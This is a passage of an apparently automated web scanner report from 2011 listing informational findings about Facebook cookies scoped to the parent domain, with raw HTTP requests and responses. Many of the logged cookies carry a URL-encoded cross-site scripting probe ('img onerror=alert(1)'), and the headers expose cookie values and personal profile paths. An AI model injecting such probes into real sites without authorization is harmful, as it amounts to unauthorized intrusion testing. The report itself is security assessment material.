The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.75. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.77. http://www.facebook.com/patroyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/patroyo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky%20-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.187.63
X-Cnection: close
Date: Thu, 05 May 2011 11:56:54 GMT
Content-Length: 0

10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0

10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=bYeMg; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.83. http://www.facebook.com/policy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

10.84. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.85. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile.php?id=1708077046 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Roy-Chastain/1708077046
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.75
Connection: close
Date: Thu, 05 May 2011 11:42:14 GMT
Content-Length: 0

10.86. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.87. http://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/recover.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recover.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/recover.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.155.107
X-Cnection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 0
Connection: close

10.88. http://www.facebook.com/robynalys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/robynalys

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.89. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
